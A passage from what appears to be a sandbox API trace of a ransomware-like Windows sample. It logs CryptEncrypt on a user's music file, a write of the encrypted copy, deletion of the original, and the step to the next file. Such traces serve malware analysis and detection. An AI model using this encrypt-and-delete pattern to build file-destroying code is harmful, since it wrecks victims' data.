out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0110.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0110.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e27e8 | out: hHeap=0x1780000) returned 1 [0110.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0110.463] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.463] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.463] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca730, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.463] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x12fb3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x12fc0) returned 1 [0110.463] CharLowerBuffW (in: lpsz="byte[77761]", cchLength=0xb | out: lpsz="byte[77761]") returned 0xb [0110.463] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.463] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca880, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.464] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49acfc8*, pdwDataLen=0x144e790*=0x12fb3, dwBufLen=0x12fc0 | out: pbData=0x49acfc8*, pdwDataLen=0x144e790*=0x12fc0) returned 1 [0110.464] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.464] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.464] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.466] WriteFile (in: hFile=0x298, lpBuffer=0x4528fd8*, nNumberOfBytesToWrite=0x12fc0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4528fd8*, lpNumberOfBytesWritten=0x144f194*=0x12fc0, lpOverlapped=0x0) returned 1 [0110.468] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0110.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca370, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0110.468] CryptDestroyKey (hKey=0x41ac140) returned 1 [0110.468] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.511] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.511] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.511] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.511] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0110.512] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0110.512] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.512] FreeLibrary (hLibModule=0x756e0000) returned 1 [0110.512] CloseHandle (hObject=0x258) returned 1 [0110.512] CloseHandle (hObject=0x298) returned 1 [0110.518] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3", lpFilePart=0x0) returned 0x2b [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0110.519] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3" (normalized: "c:\\users\\fd1hvy\\music\\gxtg5sqysgjuipish.mp3")) returned 0x20 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0110.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0110.519] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40a7170, ftCreationTime.dwHighDateTime=0x1d5e703, ftLastAccessTime.dwLowDateTime=0x84cc6ba0, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x84cc6ba0, ftLastWriteTime.dwHighDateTime=0x1d5edc4, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="gXtG5sqySgJuIPIsH.mp3", cAlternateFileName="GXTG5S~1.MP3")) returned 0x41ac440 [0110.520] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\gXtG5sqySgJuIPIsH.mp3" (normalized: "c:\\users\\fd1hvy\\music\\gxtg5sqysgjuipish.mp3")) returned 1 [0110.559] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40a7170, ftCreationTime.dwHighDateTime=0x1d5e703, ftLastAccessTime.dwLowDateTime=0x84cc6ba0, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x84cc6ba0, ftLastWriteTime.dwHighDateTime=0x1d5edc4, nFileSizeHigh=0x0, nFileSizeLow=0x12fb3, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="gXtG5sqySgJuIPIsH.mp3", cAlternateFileName="GXTG5S~1.MP3")) returned 0 [0110.560] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0110.560] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0110.560] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9e48 | out: hHeap=0x1780000) returned 1 [0110.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0110.561] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0110.561] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0110.561] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0110.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7860 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0110.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0110.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b60 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0110.562] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0110.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0110.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.562] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0110.562] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0110.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0110.562] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935f67b0, ftCreationTime.dwHighDateTime=0x1d5e9c5, ftLastAccessTime.dwLowDateTime=0xf1ec05f0, ftLastAccessTime.dwHighDateTime=0x1d5ed3e, ftLastWriteTime.dwLowDateTime=0xf1ec05f0, ftLastWriteTime.dwHighDateTime=0x1d5ed3e, nFileSizeHigh=0x0, nFileSizeLow=0x12e0b, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="Juj1PsS7vx.m4a", cAlternateFileName="JUJ1PS~1.M4A")) returned 0x41ac440 [0110.562] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0110.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0110.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0110.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0110.563] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0110.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0110.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0110.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ba8 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0110.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0110.563] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0110.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0110.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0110.564] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0110.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0110.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0110.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0110.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0110.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 